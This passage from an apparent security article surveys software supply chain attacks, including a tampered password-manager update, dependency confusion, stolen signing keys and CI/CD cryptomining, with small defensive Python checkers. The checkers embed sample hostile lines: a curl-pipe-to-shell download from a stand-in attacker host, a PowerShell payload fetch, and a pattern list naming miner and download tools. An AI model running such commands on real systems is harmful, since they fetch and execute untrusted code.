The illicit update contained a modified DLL file, Moserware.SecretSplitter.dll, a small part of which is shown below:
In a security advisory, Click Studios stated:
“The compromise existed for approximately 28 hours before it was closed down. Only customers that performed In-Place Upgrades between the times stated above are believed to be affected. Manual Upgrades of Passwordstate are not compromised. Affected customers password records may have been harvested.”
In addition to its technical aspect (the tampered upgrade process), this supply chain attack had a social engineering aspect as well. In the counterfeit update zip file, which is over 300 MB in size, I discovered that the attackers had altered the user manuals, help files, and PowerShell build scripts to point to their malicious content distribution network (CDN) server:
The social engineering aspect of this attack demonstrates another weakness: humans (especially newer developers or software consumers) may not think to question links to content distribution networks (CDNs), suspicious or otherwise, because CDNs are legitimately used by software applications and websites to deliver updates, scripts, and other content.
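One practical countermeasure is to check that URLs embedded in build scripts and documentation point only at domains a project is expected to use. The sketch below shows the idea with Python's standard library; the allowlist and the sample script line are hypothetical, not taken from the Passwordstate incident.

```python
from urllib.parse import urlparse

# Hypothetical allowlist of domains this project is expected to download from.
ALLOWED_HOSTS = {"cdn.example.com", "downloads.example.com"}

def find_unexpected_urls(text: str) -> list[str]:
    """Return URLs in `text` whose host is not on the allowlist."""
    suspicious = []
    for token in text.split():
        if token.startswith(("http://", "https://")):
            host = urlparse(token).hostname or ""
            if host not in ALLOWED_HOSTS:
                suspicious.append(token)
    return suspicious

script = "Invoke-WebRequest https://evil-cdn.example.net/payload.ps1"
print(find_unexpected_urls(script))  # ['https://evil-cdn.example.net/payload.ps1']
```

A check like this would have flagged the altered PowerShell build scripts, since the attackers' CDN host would not appear on the vendor's allowlist.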
3. Dependency confusion attacks
In 2021, no piece on supply chain attacks would be complete without mentioning dependency confusion, especially because of how simple and automated this attack is. Dependency confusion attacks require minimal effort from the attacker and run in an automated fashion, thanks to an inherent design weakness found in multiple open-source ecosystems.
Put simply, dependency confusion (or namespace confusion) works when your software build uses a private, internally created dependency that does not exist in a public open-source repository. An attacker can register a dependency with the same name on a public repository, with a higher version number. The attacker's (public) dependency with the higher version number will then very likely be pulled into your software build instead of your internal dependency.
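The flawed resolution behavior can be sketched in a few lines. This is a simplified model, not the logic of any real package manager, and the package names and versions are hypothetical: a resolver that merges candidates from a private and a public index and simply picks the highest version hands the win to the attacker.

```python
# Minimal model of the naive resolution behavior dependency confusion exploits:
# the resolver sees both indexes and picks the highest version, period.
private_index = {"acme-internal-utils": ["1.0.0", "1.2.0"]}
public_index = {"acme-internal-utils": ["99.0.0"]}  # attacker-registered name

def resolve(name: str) -> tuple[str, str]:
    """Return (source, version) of the highest version across both indexes."""
    candidates = []
    for source, index in (("private", private_index), ("public", public_index)):
        for version in index.get(name, []):
            key = tuple(int(part) for part in version.split("."))
            candidates.append((key, source, version))
    _, source, version = max(candidates)
    return source, version

print(resolve("acme-internal-utils"))  # ('public', '99.0.0')
```

The attacker's 99.0.0 release beats every internal version, which is why simply bumping your private version numbers is not a durable defense.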
By exploiting this simple weakness across commonly used ecosystems including PyPI, npm and RubyGems, ethical hacker Alex Birsan was able to hack into 35 big tech firms and walk away with over $130,000 in bug bounty rewards.
Days following Birsan’s research disclosure, thousands of dependency confusion copycat packages began flooding PyPI, npm and other ecosystems. Although most of these copycats were created by other aspiring bug bounty hunters, some went a step too far by targeting known companies in a malicious manner.
There are multiple ways to resolve dependency confusion, including registering (reserving) the names of all your private dependencies on public repositories before an attacker does, and using automated solutions such as a software development lifecycle (SDLC) firewall that blocks conflicting dependency names from entering your supply chain.
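One check such a firewall might run can be sketched as follows. This is an illustrative outline, not a real product's logic: it flags any internal package name that also exists on a public index, since that collision is exactly what dependency confusion exploits. The package names and the stubbed public lookup are hypothetical; a real implementation would query the public registry's API.

```python
# Hypothetical set of internally developed package names.
internal_packages = {"acme-internal-utils", "acme-billing-core"}

def public_index_has(name: str) -> bool:
    # Stand-in for a real lookup (e.g., querying a public registry's API).
    known_public = {"requests", "acme-internal-utils"}
    return name in known_public

def find_collisions(names) -> list[str]:
    """Return internal names that also exist publicly, sorted for review."""
    return sorted(n for n in names if public_index_has(n))

print(find_collisions(internal_packages))  # ['acme-internal-utils']
```

Any name this reports either needs to be reserved by you on the public repository or treated as a potential attack in progress.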
Owners of open-source repositories can adopt a more stringent verification process and enforce namespacing or scoping. For example, to post packages under the “CSO” namespace or scope, an open-source repository could verify that the developer uploading a package has the rights to do so under the name “CSO.”
Java component repository Maven Central uses simple domain-based verification of namespace ownership, a practice that could easily be modeled by other ecosystems. [Full disclosure: Maven Central is maintained by my employer, Sonatype.]
Similarly, packages published to the Go package repository are named after the URL of the source repository that hosts them (e.g., a GitHub URL), making dependency confusion attacks much more challenging, if not outright impossible.
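The domain-based idea can be sketched simply. This is a conceptual outline, not Maven Central's actual process: a coordinate like com.example:lib is accepted only from a publisher who has proven control of example.com (in practice via DNS records or a repository-hosted proof). The publisher names and ownership table below are hypothetical.

```python
# Hypothetical table of publishers and the domains they have proven they own.
verified_domains = {"alice": {"example.com"}}

def may_publish(publisher: str, group_id: str) -> bool:
    """Map a reverse-DNS group id back to a domain and check ownership."""
    parts = group_id.split(".")
    domain = ".".join(reversed(parts[:2]))  # "com.example.libs" -> "example.com"
    return domain in verified_domains.get(publisher, set())

print(may_publish("alice", "com.example.libs"))    # True
print(may_publish("mallory", "com.example.libs"))  # False
```

Because an attacker cannot prove control of a victim's domain, they cannot squat names inside that victim's namespace.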
4. Stolen SSL and code-signing certificates
With the rise of HTTPS websites, SSL/TLS certificates are now ubiquitous and protect your online communications. A compromise of an SSL certificate's private key therefore threatens the confidentiality and authenticity assurances that an end-to-end encrypted connection offers end users.
In January 2021, Mimecast disclosed that a certificate its customers use to establish connections to Microsoft 365 Exchange services had been compromised, potentially impacting the communications of about 10% of Mimecast users. While Mimecast did not explicitly confirm that this was an SSL certificate, some researchers suspect this was largely the case.
While a compromised SSL certificate is problematic, a stolen code-signing certificate (i.e., a compromised private key) can have far wider consequences for software security. Attackers who get their hands on the private code-signing key can potentially sign their malware as an authentic software program or update being shipped by a reputable company.
Although Stuxnet remains a significant example of a sophisticated attack in which stolen private keys from two prominent companies were used to sign malicious code as “trusted,” such attacks occurred before Stuxnet and have continued in the years since. This is also why the aforementioned exposure of HashiCorp's GPG private key in the Codecov supply chain attack is problematic. Although there is no indication yet that the compromised key was abused by attackers to sign malware, such an incident remained a real possibility until the key was revoked.
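Full signature verification requires the publisher's public key, but the verification step consumers perform can be illustrated with a simpler, related integrity check: comparing a downloaded artifact against a checksum published over a trusted channel. The sketch below computes the “published” checksum inline purely for illustration; a checksum hosted on the same compromised server proves nothing, which is exactly why signatures (and protecting their private keys) matter.

```python
import hashlib

def sha256_of(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()

# Stand-in for a downloaded release binary and its vendor-published checksum.
artifact = b"pretend this is the downloaded release binary"
published_checksum = sha256_of(artifact)  # would come from the vendor's site

def verify(data: bytes, expected: str) -> bool:
    """Accept the artifact only if its hash matches the published value."""
    return sha256_of(data) == expected

print(verify(artifact, published_checksum))                # True
print(verify(artifact + b"tampered", published_checksum))  # False
```

A stolen code-signing key defeats even the stronger signed variant of this check, since the attacker's tampered artifact then verifies as genuine.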
5. Targeting developers’ CI/CD infrastructure
Sonatype recently observed a multi-faceted software supply chain attack that not only relied on the introduction of malicious pull requests to a user’s GitHub project, but also abused GitHub’s CI/CD automation infrastructure, GitHub Actions, to mine cryptocurrency. GitHub Actions provides developers with a way to schedule automated CI/CD tasks for repositories hosted on GitHub.
The attack consisted of attackers cloning legitimate GitHub repositories that used GitHub Actions, slightly altering the GitHub Action script in the repository, and filing a pull request for the project owner to merge this change back into the original repository.
Should a project owner casually approve the altered pull request, the supply chain attack succeeds, but approval wasn't even a prerequisite here. The malicious pull request contained modifications to ci.yml that GitHub Actions ran automatically as soon as the attacker filed the pull request. The modified code essentially abused GitHub's servers to mine cryptocurrency.
Such an attack kills two birds with one stone: It tricks a developer into accepting a malicious pull request, and should that fail, it abuses the automated CI/CD infrastructure in place for conducting malicious activities.
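A review aid for this class of abuse can be sketched as follows: flag pull requests that touch workflow files and add shell commands commonly seen in CI cryptomining abuse. The patterns and the sample diff line are illustrative assumptions, not a real detection ruleset or the actual payload from this attack.

```python
# Illustrative indicators only; real detection would use a maintained ruleset.
SUSPICIOUS_PATTERNS = ("curl ", "wget ", "xmrig", "stratum+tcp://")

def flag_workflow_diff(changed_path: str, added_lines: list[str]) -> list[str]:
    """Return added lines in a workflow file that match suspicious patterns."""
    if not changed_path.startswith(".github/workflows/"):
        return []
    return [line for line in added_lines
            if any(p in line for p in SUSPICIOUS_PATTERNS)]

diff = ["      - run: curl -s http://attacker.invalid/miner | sh"]
print(flag_workflow_diff(".github/workflows/ci.yml", diff))
```

Pattern matching alone is easy to evade, so treating any pull request that modifies workflow files as high-risk, and requiring approval before workflows run for first-time contributors, is the more robust control.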
Likewise, the researchers who successfully breached United Nations (UN) domains and accessed over 100,000 UNEP staff records were able to do so mainly because they found exposed Git folders and “git-credentials” files on these domains. A threat actor who obtains Git credentials can not only clone private Git repositories but potentially introduce malicious code upstream, triggering a supply chain attack with much harsher consequences.
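The underlying misconfiguration is straightforward to audit for. As a minimal sketch, assuming you can enumerate the paths reachable under a deployed web root, the check below flags git artifacts that should never be web-accessible; the file listing is hypothetical.

```python
def find_git_exposure(paths: list[str]) -> list[str]:
    """Flag web-reachable paths whose final segment is a git artifact."""
    risky = (".git", ".git-credentials", "git-credentials")
    return [p for p in paths if p.rsplit("/", 1)[-1] in risky]

# Hypothetical listing of paths reachable under a web root.
listing = ["index.html", "assets/app.js", ".git", "deploy/.git-credentials"]
print(find_git_exposure(listing))  # ['.git', 'deploy/.git-credentials']
```

Blocking these paths at the web server and keeping credentials out of deployed directories entirely closes the hole the UN researchers walked through.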
The primary focus of those looking to prevent supply chain attacks has been on recommending secure coding practices to developers or using DevSecOps automation tools in development environments. However, securing CI/CD pipelines (e.g., Jenkins servers), cloud-native containers, and supplementary developer tooling and infrastructure has now become just as important.
6. Using social engineering to drop malicious code
As any security professional knows, security is only as strong as its weakest link. Because the human element remains the weakest link, exploitation may come from where it is least expected. The Linux Foundation recently banned University of Minnesota researchers who had been submitting intentionally buggy “patches” that introduced vulnerabilities into the Linux kernel source code.
Although this instance was caught and has now been dealt with, it demonstrates a few simple facts: Developers are spread thin and may not always have the bandwidth to vet every code commit or proposed change that may be buggy or outright malicious. More importantly, social engineering may come from the least suspected sources, in this case seemingly credible university researchers with “.edu” email addresses.
Another recent example includes how any collaborator contributing to a GitHub project can alter a release even after it is published. Here again, the expectation of a project owner is that most contributors are submitting code and commits to their project in good faith. It takes just one collaborator to go rogue and compromise the security of the supply chain for many.
Over the last year, attackers have repeatedly targeted open-source developers with typosquatting and brandjacking packages to introduce malicious code into upstream builds, from which it then propagates to many consumers.
All these real-world examples demonstrate different weaknesses, attack vectors, and techniques that threat actors employ in successful supply chain attacks. As these attacks continue to evolve and pose challenges, more innovative solutions and strategies are needed when approaching software security.